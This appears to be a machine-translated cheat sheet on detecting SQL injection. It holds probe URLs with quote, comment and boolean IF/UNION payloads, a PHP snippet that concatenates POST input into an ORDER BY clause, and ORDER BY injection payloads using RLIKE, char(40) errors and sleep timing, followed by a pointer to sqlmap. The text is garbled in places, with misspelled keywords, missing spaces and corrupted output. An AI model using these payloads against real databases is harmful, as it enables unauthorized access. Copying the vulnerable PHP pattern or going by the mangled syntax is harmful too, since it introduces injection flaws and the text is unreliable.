Summary of SQL injection judgment method (continuous update)

http//e.com/1.php?id=1http//e.com/1.php?id=1--SDhttp://e.com/1.php?id=aaahttp//e.com/1.php?id=aaa '--SDhttp://e.com/1.php?id=aaahttp//e.com/1.php?id=aaa "http//e.com/1.php?id=aaa ' | | 'http//e.com/1.php?id=aaa '%2b 'ID=1and1=if(1=2,1,(Select 1UnionSelect 2)) ID=1and1=if(1=1,1,(Select 1UnionSelect 2)) ID=1ORDER BY1Normal ID=1ORDER BY1, the error ID=1ORDER BY1,1Normal content-type:application/JSON: You can try using \u0027 instead of single quotes. 

Inject by:

<?Php$con= Mysql_connect ("localhost","Root","123456") or Die (); mysql_select_db ("burp");$ by= $_post[' by']; $order= $_post['Order']; $sql="SELECT * from ' SQL ' order by".$ by." ". $order; echo $sql; $res=mysql_query ($sql); Echo"<br><br>"; Echo"<b>"; while($rows =@mysql_fetch_array ($res, MYSQL_ASSOC)) {echo $rows ['New'];} Echo"<b>";?>

The above code $orderby and $order all exist injected

In general, I would like to test the order by parameter.

Orderby=id,&order=asc

Orderby=id,1&order=asc

So it can be injected like this.

, if (1=1,1, (select 1 Union sleect 2))

, if (1=2,1, (select 1 Union sleect 2))

Then you can put it in the Sqlmap and run happily.

The order parameter is as above.

Here's another way to inject:

List 2 Statements First

Mysql>SelectUser fromMysql.userwhereUser='Admin'Order BY User RlikeChar( +); ERROR1139(42000): Got Error'parentheses not balanced'  fromRegexpmysql>SelectUser fromMysql.userwhereUser='Admin'Order BY User Rlike1;+-------+| User |+-------+| Admin |+-------+1Rowinch Set(0.00Sec

So you can construct a statement like this.

Orderby=id&order=rlike if (1=1,1,char (40))

Orderby=id&order=rlike if (1=21,1,char (40))

or Rlike (case is 1=1 then 1 else (select 1 Union select 2) end)

Run the data, you can

Rlike (case if 1=1 Sqlinject then 1 else (select 1 Union select 2) end)

Finally, you can also use sleep to make a judgment injection.

Orderby=sleep (1) &ORDER=ASC

SQL Injection Judgment Method Summary (continuous update)